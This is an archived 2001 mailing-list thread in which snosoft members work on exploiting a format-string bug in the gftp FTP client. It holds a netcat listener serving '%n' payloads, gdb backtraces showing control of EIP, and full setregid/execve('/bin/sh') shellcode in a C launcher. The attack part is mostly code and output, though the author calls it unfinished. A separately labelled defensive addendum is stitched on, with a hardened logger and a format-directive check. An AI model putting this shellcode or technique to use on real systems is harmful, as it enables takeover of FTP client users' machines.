From: KRF (dotslash SNOSOFT.COM)
Date: Fri Apr 27 2001 - 17:11:45 CDT
Here are some of the other ways of playing with gftp
that the SRTeam of snosoft.com have been playing with.
http://www.snosoft.com/SRTeam/srteam.html
-Krfinisterre
-------- Original Message --------
Subject: heres how to exploit gftp
Date: Sat, 21 Apr 2001 19:20:22 +0000
From: KRF <dotslash snosoft.com>
Reply-To: krfinisterre checkfree.com
To: recon snosoft.com
here are some ideas... data can u help out...
(root)>./execve
shellcode addy: 0xbffff848
ctrl-C
(root)>echo -e "\x48\xf8\xff\xbf"
Høÿ¿
%n writes data to the current frame; see example...
(root)>echo -e "AAAA%n" > file
(root)>nc -l -p 21 < file
Program received signal SIGSEGV, Segmentation fault.
0x40325dd7 in vfprintf () from /lib/libc.so.6
(gdb) bt
#0 0x40325dd7 in vfprintf () from /lib/libc.so.6
#1 0x40332bbc in vsprintf () from /lib/libc.so.6
#2 0x401ae8d2 in g_strdup_vprintf () from /usr/lib/libglib-1.2.so.0
#3 0x8111248 in ?? ()
Cannot access memory at address 0x41414141
sooooooooo knowing that we control the eip, let's try to point it at some
shellcode.
(root)>echo -e "\x48\xf8\xff\xbf%n" > file
(root)>nc -l -p 21 < file
(gdb) run ftp://localhost
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /usr/bin/gftp ftp://localhost
warning: Unable to find dynamic linker breakpoint function.
Program received signal SIG32, Real-time event 32.
0x4030617e in sigsuspend () from /lib/libc.so.6
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0x40325dd7 in vfprintf () from /lib/libc.so.6
(gdb) bt
#0 0x40325dd7 in vfprintf () from /lib/libc.so.6
#1 0x40332bbc in vsprintf () from /lib/libc.so.6
#2 0x401ae8d2 in g_strdup_vprintf () from /usr/lib/libglib-1.2.so.0
#3 0x403c8010 in __morecore () from /lib/libc.so.6
#4 0x80beaf8 in ?? ()
#5 0xbffffa31 in ?? ()
#6 0x6e69622f in ?? ()
Cannot access memory at address 0x7273752f
(gdb) Quit
I have no idea where I ended up; perhaps you can help??
This is definitely not the proper approach to this...
(root)>cat > execve.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main(void)
{
    /* setregid(12, 12) followed by execve("/bin/sh"), as posted */
    char hell[] =
    /* main: */ /* setregid(12, 12); */
    "\x29\xc0" /* subl %eax, %eax */
    "\xb0\x47" /* movb $71, %al */
    "\x29\xdb" /* subl %ebx, %ebx */
    "\xb3\x0c" /* movb $12, %bl */
    "\x89\xd9" /* movl %ebx, %ecx */
    "\xcd\x80" /* int $0x80 */
    "\xeb\x18" /* jmp callz */
    "\x5e" /* popl %esi */
    "\x29\xc0" /* subl %eax, %eax */
    "\x88\x46\x07" /* movb %al, 0x07(%esi) */
    "\x89\x46\x0c" /* movl %eax, 0x0c(%esi) */
    "\x89\x76\x08" /* movl %esi, 0x08(%esi) */
    "\xb0\x0b" /* movb $0x0b, %al */
    "\x87\xf3" /* xchgl %esi, %ebx */
    "\x8d\x4b\x08" /* leal 0x08(%ebx), %ecx */
    "\x8d\x53\x0c" /* leal 0x0c(%ebx), %edx */
    "\xcd\x80" /* int $0x80 */
    "\xe8\xe3\xff\xff\xff" /* call start */
    "\x2f\x62\x69\x6e\x2f\x73\x68"; /* "/bin/sh" */

    /* print the buffer's address; this is the value echoed into the file above */
    printf("shellcode addy: 0x%lx\n", (unsigned long) hell);

    /* replace this process image with gftp pointed at the local listener */
    execl("/usr/bin/gftp", "gftp", "ftp://localhost", (char *) 0);
    exit(0);
}
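Added example, not code from the post or from gftp: a hypothetical reply logger written in the vulnerable shape the backtrace points at (server text reaching vsprintf as the format), the hardened form beside it, and a small check for '%' directives in untrusted text. Function names and the sample replies are constructed for this example.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical reply logger in the shape the backtrace suggests: the server's
 * text reaches a printf-style function as the FORMAT (vsprintf frame), so every
 * '%' in it is interpreted and "%n" becomes a write through a stack value. */
static void log_reply_unsafe(char *out, size_t outsz, const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    vsnprintf(out, outsz, fmt, ap);
    va_end(ap);
}

/* Hardened form: constant format, reply passed as data, so "%n" is copied
 * literally instead of being interpreted. */
void log_reply_safe(char *out, size_t outsz, const char *reply)
{
    snprintf(out, outsz, "%s", reply);
}

/* Returns 1 if s holds a conversion directive (a '%' not followed by another
 * '%'); "%%" is a literal percent sign and does not count. */
int has_format_directive(const char *s)
{
    for (const char *p = s; *p; p++) {
        if (*p != '%')
            continue;
        if (p[1] == '%') {  /* escaped percent */
            p++;
            continue;
        }
        return 1;
    }
    return 0;
}

int main(void)
{
    char buf[64];
    const char *benign = "220 ftp ready";  /* constructed sample banner */
    const char *probe  = "AAAA%n";         /* the probe from the post */

    log_reply_unsafe(buf, sizeof buf, benign);  /* harmless only because benign has no '%' */
    printf("unsafe(benign): %s\n", buf);
    log_reply_safe(buf, sizeof buf, probe);     /* "%n" stays literal */
    printf("safe(probe): %s, directive=%d\n", buf, has_format_directive(probe));
    return 0;
}
```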